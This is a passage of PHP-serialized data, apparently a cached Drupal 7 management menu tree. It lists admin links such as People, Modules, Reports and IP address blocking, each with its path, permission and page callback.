fields\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"48\";s:2:\"p4\";s:2:\"90\";s:2:\"p5\";s:3:\"315\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:76:\"a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:28:\"admin/config/people/accounts\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:13:\"Manage fields\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:104;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"104\";s:4:\"plid\";s:2:\"48\";s:9:\"link_path\";s:31:\"admin/config/people/ip-blocking\";s:11:\"router_path\";s:31:\"admin/config/people/ip-blocking\";s:10:\"link_title\";s:19:\"IP address blocking\";s:7:\"options\";s:78:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:28:\"Manage blocked IP addresses.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"48\";s:2:\"p4\";s:3:\"104\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"block IP addresses\";}\";s:13:\"page_callback\";s:18:\"system_ip_blocking\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:31:\"admin/config/people/ip-blocking\";s:5:\"title\";s:19:\"IP address blocking\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:28:\"Manage blocked IP addresses.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:51;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"51\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:21:\"admin/config/regional\";s:11:\"router_path\";s:21:\"admin/config/regional\";s:10:\"link_title\";s:21:\"Regional and language\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Regional settings, localization and translation.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-5\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"51\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/config/regional\";s:5:\"title\";s:21:\"Regional and language\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Regional settings, localization and translation.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:53;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"53\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:19:\"admin/config/search\";s:11:\"router_path\";s:19:\"admin/config/search\";s:10:\"link_title\";s:19:\"Search and metadata\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"Local site search, metadata and SEO.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"53\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/config/search\";s:5:\"title\";s:19:\"Search and metadata\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"Local site search, metadata and SEO.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:56;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"56\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:19:\"admin/config/system\";s:11:\"router_path\";s:19:\"admin/config/system\";s:10:\"link_title\";s:6:\"System\";s:7:\"options\";s:87:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:37:\"General system related configuration.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"56\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/config/system\";s:5:\"title\";s:6:\"System\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:37:\"General system related configuration.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:61;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"61\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:27:\"admin/config/user-interface\";s:11:\"router_path\";s:27:\"admin/config/user-interface\";s:10:\"link_title\";s:14:\"User interface\";s:7:\"options\";s:88:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:38:\"Tools that enhance the user interface.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/config/user-interface\";s:5:\"title\";s:14:\"User interface\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:38:\"Tools that enhance the user interface.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:64;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"64\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:21:\"admin/config/services\";s:11:\"router_path\";s:21:\"admin/config/services\";s:10:\"link_title\";s:12:\"Web services\";s:7:\"options\";s:80:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:30:\"Tools related to web services.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"64\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/config/services\";s:5:\"title\";s:12:\"Web services\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:30:\"Tools related to web services.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:65;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"65\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:21:\"admin/config/workflow\";s:11:\"router_path\";s:21:\"admin/config/workflow\";s:10:\"link_title\";s:8:\"Workflow\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"Content workflow, editorial workflow tools.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"65\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/config/workflow\";s:5:\"title\";s:8:\"Workflow\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"Content workflow, editorial workflow tools.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, 